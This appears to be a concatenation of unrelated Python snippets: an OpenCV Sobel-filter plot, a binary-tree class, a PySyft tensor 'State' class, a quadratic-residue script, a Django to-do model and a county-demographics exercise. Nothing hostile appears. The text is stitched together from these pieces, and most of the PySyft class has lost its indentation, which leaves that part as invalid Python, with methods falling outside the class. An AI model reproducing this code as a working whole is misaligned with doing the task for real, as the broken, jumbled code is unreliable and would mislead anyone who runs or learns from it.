sobelx = cv2.Sobel(img0,cv2.CV_64F,1,0,ksize=3) # x derivative
sobely = cv2.Sobel(img0,cv2.CV_64F,0,1,ksize=3) # y derivative
# 2x2 figure: original image plus each gradient image, axes hidden
plt.subplot(2,2,1),plt.imshow(img0,cmap = 'gray')
plt.title('Original'), plt.xticks([]), plt.yticks([])
plt.subplot(2,2,2),plt.imshow(sobelx,cmap = 'gray')
plt.title('Sobel horizontal'), plt.xticks([]), plt.yticks([])
plt.subplot(2,2,3),plt.imshow(sobely,cmap = 'gray')
plt.title('Sobel vertical'), plt.xticks([]), plt.yticks([])
plt.show()
|
class Node(object):
    """A binary-tree node holding a value and two child links."""

    def __init__(self, value):
        self.value = value
        self.left = None
        self.right = None
class BinaryTree(object):
    """Binary tree with recursive search and the three classic traversals."""

    def __init__(self, root):
        self.root = root

    def preorder_search(self, start, value):
        """Return True if *value* occurs in the subtree rooted at *start*."""
        if start:
            if start.value == value:
                return True
            if self.preorder_search(start.left, value):
                return True
            if self.preorder_search(start.right, value):
                return True
        return False

    def search(self, value):
        # FIX(consistency): the original duplicated preorder_search's body
        # verbatim here; delegating keeps the two from drifting apart.
        return self.preorder_search(self.root, value)

    def preorder_print(self, start):
        """Values in root, left-subtree, right-subtree order."""
        a = []
        if start:
            a.append(start.value)
            # Recursing into None simply contributes an empty list, so the
            # original's explicit child checks are unnecessary.
            a += self.preorder_print(start.left)
            a += self.preorder_print(start.right)
        return a

    def inorder_print(self, start):
        """Values in left-subtree, root, right-subtree order."""
        a = []
        if start:
            a += self.inorder_print(start.left)
            a.append(start.value)
            a += self.inorder_print(start.right)
        return a

    def postorder_print(self, start):
        """Values in left-subtree, right-subtree, root order."""
        a = []
        if start:
            a += self.postorder_print(start.left)
            a += self.postorder_print(start.right)
            a.append(start.value)
        return a
# Build a small complete tree:
#         1
#       /   \
#      2     3
#     / \   / \
#    4   5 6   7
tree = BinaryTree(Node(1))
tree.root.left = Node(2)
tree.root.right = Node(3)
tree.root.left.left = Node(4)
tree.root.left.right = Node(5)
tree.root.right.left = Node(6)
tree.root.right.right = Node(7)
if __name__ == "__main__":
    # Test search
    # Should be True
    print (tree.search(4))
    # Should be False
    print (tree.search(9))
    print (tree.preorder_print(tree.root))
    print (tree.postorder_print(tree.root))
|
from typing import List
from typing import Tuple
from typing import Union
from typing import Dict
import torch
import syft as sy
from syft.workers.abstract import AbstractWorker
class State(object):
"""The State is a Plan attribute and is used to send tensors along functions.
It references Plan tensor or parameters attributes using their name, and make
sure they are provided to remote workers who are sent the Plan.
"""
def __init__(self, owner, plan=None, state_ids=None):
    # owner: the worker that stores the tensors referenced by this state.
    # plan: the Plan this state belongs to, if any.
    # state_ids: ids of the tensors/parameters making up the state
    #            (falsy -> fresh empty list).
    self.owner = owner
    self.plan = plan
    self.state_ids = state_ids or []
def __str__(self):
    """Human-readable listing of the state's tensor ids."""
    id_list = "".join(" {}".format(state_id) for state_id in self.state_ids)
    return "<State:" + id_list + ">"
def __repr__(self):
    """Mirror __str__ for debugger/interactive output."""
    return str(self)
def tensors(self) -> List:
    """Fetch every state element from the owner, verifying that each
    stored object's id matches the id recorded in state_ids."""
    fetched = []
    for state_id in self.state_ids:
        element = self.owner.get_obj(state_id)
        assert element.id == state_id
        fetched.append(element)
    return fetched
def clone_state_dict(self) -> Dict:
"""
Return a clone of the state elements. Tensor ids are kept.
"""
return {tensor.id: tensor.clone() for tensor in self.tensors()}
def copy(self) -> "State":
state = State(owner=self.owner, state_ids=self.state_ids.copy())
return state
def read(self):
"""
Return state elements
"""
tensors = []
for state_id in self.state_ids:
tensor = self.owner.get_obj(state_id)
tensors.append(tensor)
return tensors
def set_(self, state_dict):
"""
Reset inplace the state by feeding it a dict of tensors or params
"""
assert list(self.state_ids) == list(state_dict.keys())
for state_id, new_tensor in state_dict.items():
tensor = self.owner.get_obj(state_id)
with torch.no_grad():
tensor.set_(new_tensor)
tensor.child = new_tensor.child if new_tensor.is_wrapper else None
tensor.is_wrapper = new_tensor.is_wrapper
if tensor.child is None:
delattr(tensor, "child")
@staticmethod
def create_grad_if_missing(tensor):
if isinstance(tensor, torch.nn.Parameter) and tensor.grad is None:
o = tensor.sum()
o.backward()
if tensor.grad is not None:
tensor.grad -= tensor.grad
def send_for_build(self, location, **kwargs):
"""
Send functionality that can only be used when sending the state for
building the plan.
"""
for tensor in self.tensors():
self.create_grad_if_missing(tensor)
tensor.send_(location, **kwargs)
def fix_precision_(self, *args, **kwargs):
for tensor in self.tensors():
self.create_grad_if_missing(tensor)
tensor.fix_precision_(*args, **kwargs)
def float_precision_(self):
for tensor in self.tensors():
tensor.float_precision_()
def share_(self, *args, **kwargs):
for tensor in self.tensors():
self.create_grad_if_missing(tensor)
tensor.share_(*args, **kwargs)
def get_(self):
"""
Get functionality that can only be used when getting back state
elements converted to additive shared tensors. Other than this,
you shouldn't need to the get the state separately.
"""
# TODO Make it only valid for AST
for tensor in self.tensors():
tensor.get_()
@staticmethod
def simplify(worker: AbstractWorker, state: "State") -> tuple:
"""
Simplify the plan's state when sending a plan
"""
return (
sy.serde.msgpack.serde._simplify(worker, state.state_ids),
sy.serde.msgpack.serde._simplify(worker, state.tensors()),
)
@staticmethod
def detail(worker: AbstractWorker, state_tuple: tuple) -> "State":
"""
Reconstruct the plan's state from the state elements and supposed
ids.
"""
state_ids, state_elements = state_tuple
state_ids = sy.serde.msgpack.serde._detail(worker, state_ids)
state_elements = sy.serde.msgpack.serde._detail(worker, state_elements)
for state_id, state_element in zip(state_ids, state_elements):
worker.register_obj(state_element, obj_id=state_id)
state = State(owner=worker, plan=None, state_ids=state_ids)
return state
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 3 11:57:11 2019
@author: emilyhoward
"""
import math
import numpy as np
# Result accumulators: rows are appended per prime below.
# quad rows: [prime, number of distinct values collected for that prime]
quad = np.zeros ([0,2])
# negativeone rows: [prime, "True"/"False" flag for -1 being a residue]
negativeone = np.zeros ([0,2])
# Inclusive upper bound on the primes examined.
P = 30
def primecheck(x):
    """Return True if the integer x is prime, False otherwise.

    Trial division up to the integer square root of x.

    Fixes vs. the original:
    - values below 2 (0 and negatives) previously fell through the loop
      and returned True; they are now rejected explicitly;
    - math.isqrt replaces math.floor(np.sqrt(x)), avoiding float rounding
      errors in the divisor bound for large x.
    """
    if x < 2:
        # 0, 1 and negatives are not prime by definition.
        return False
    for divisor in range(2, math.isqrt(x) + 1):
        if x % divisor == 0:
            return False
    return True
# All primes up to and including P, in increasing order.
primelist = [i for i in range(1, P + 1) if primecheck(i)]
# For each prime p, collect distinct values involved in n == k**2 (mod p),
# then append a [p, count] row to quad.
for p in primelist:
    num = []
    for n in range (0,p):
        for k in range (0,n+1):
            if n==(k**2)%p:
                # n is a quadratic residue mod p (it has a square root k).
                nn = n in num
                if nn == False:
                    num.append(n)
                # NOTE(review): k is the square *root* here, not a residue;
                # appending k as well looks suspicious — confirm whether the
                # intended output is only the residues n.
                kk = k in num
                if kk == False:
                    num.append(k)
    quad = np.vstack ([quad, np.array ([p,len(num)])])
# NOTE(review): "quadractic" typo is in a runtime string; left untouched.
print('These are the quadractic residues')
print (quad)
# For each prime p, record whether -1 (i.e. p - 1 mod p) is a quadratic
# residue: does any n in [0, p) satisfy n**2 == p - 1 (mod p)?
for p in primelist:
    has_root = "True" if any((n ** 2) % p == p - 1 for n in range(p)) else "False"
    # Mixing an int with a string coerces the row to strings, as before.
    negativeone = np.vstack([negativeone, np.array([p, has_root])])
print('When -1 is a quadratic residue:')
print(negativeone)
from django.db import models
# Create your models here.
# Model for an Errand that includes the name of the errand and whether it has been finished
class Errand(models.Model):
    """A single errand (to-do item) with a name and a completion flag."""
    # Human-readable errand name; also used as the display string below.
    name = models.CharField(max_length=250)
    # Completion flag. NOTE(review): null=True makes this a tri-state column
    # (NULL/False/True) even though default=False — Django's field reference
    # advises against nullable BooleanFields unless NULL is meaningful;
    # confirm whether the third state is intended before removing it
    # (removal requires a migration).
    finished = models.BooleanField(default=False, blank=True, null=True)
    def __str__(self):
        # Shown in the Django admin and anywhere the object is stringified.
        return self.name
import json
def main():
    """Load the county demographics data and print one line per report."""
    with open('county_demographics.json') as demographics_data:
        counties = json.load(demographics_data)
    # Each report takes the full county list and returns a printable value.
    reports = (
        alphabetically_first_county,
        county_most_under_18,
        percent_most_under_18,
        most_under_18,
        state_with_most_counties,
    )
    for report in reports:
        print(report(counties))
def alphabetically_first_county(counties):
    """Return the county name that comes first alphabetically."""
    # min() over the names matches the original first-wins linear scan.
    return min(county["County"] for county in counties)
def county_most_under_18(counties):
    """Return "<county name> <state>" (space-separated) for a county with the
    highest percent of under-18-year-olds; on ties the first such county wins."""
    def percent_under_18(county):
        return county["Age"]["Percent Under 18 Years"]
    # max() keeps the first maximal element, matching the strict-> scan.
    best = max(counties, key=percent_under_18)
    return best["County"] + ' ' + best["State"]
def percent_most_under_18(counties):
    """Return the highest percent of under 18 year olds, as a string.

    Bug fix: `highest` was never updated inside the loop (only the unused
    locals cName/percent were), so the first county's percentage was
    always returned regardless of the data.
    """
    highest = counties[0]["Age"]["Percent Under 18 Years"]
    for county in counties:
        percent = county["Age"]["Percent Under 18 Years"]
        if percent > highest:
            highest = percent
    return str(highest)
def most_under_18(counties):
    """Return "<county name> <state> <percent>" (space-separated string) for
    the county with the highest percent of under-18-year-olds.

    Bug fix: `highest` was never updated inside the loop, so although the
    county name and state tracked the maximum, the reported percentage was
    always the first county's value.

    NOTE(review): the original docstring promised a list; the function has
    always returned a string, so the string return is preserved.
    """
    highest = counties[0]["Age"]["Percent Under 18 Years"]
    state = counties[0]["State"]
    cName = counties[0]["County"]
    for county in counties:
        percent = county["Age"]["Percent Under 18 Years"]
        if percent > highest:
            highest = percent
            cName = county["County"]
            state = county["State"]
    return cName + ' ' + state + ' ' + str(highest)
def state_with_most_counties(counties):
    """Return "<state><count>" for a state that has the most counties.

    Bug fixes vs. the original:
    - the first county seen for each state was recorded as 0, so every
      state's total was one too low;
    - the scan was seeded with boi["CA"], raising KeyError whenever the
      data contained no California county.
    """
    # Tally counties per state (dict.get avoids the init-to-zero bug).
    counts = {}
    for county in counties:
        state = county["State"]
        counts[state] = counts.get(state, 0) + 1
    # Keep the first state with the strictly highest tally.
    best_state = None
    highest = 0
    for state, count in counts.items():
        if count > highest:
            best_state = state
            highest = count
    return best_state + str(highest)
def your_interesting_demographic_function(counties):
    """Compute and return an interesting fact using the demographic data
    about the counties in the US: the highest "Percent Under 18 Years"
    across all counties, as a string.

    Bug fix: `highest` was never updated inside the loop, so the first
    county's percentage was always returned.
    """
    highest = counties[0]["Age"]["Percent Under 18 Years"]
    for county in counties:
        percent = county["Age"]["Percent Under 18 Years"]
        if percent > highest:
            highest = percent
    return str(highest)
if __name__ == '__main__':
    # Run the demographic reports only when executed as a script.
    main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.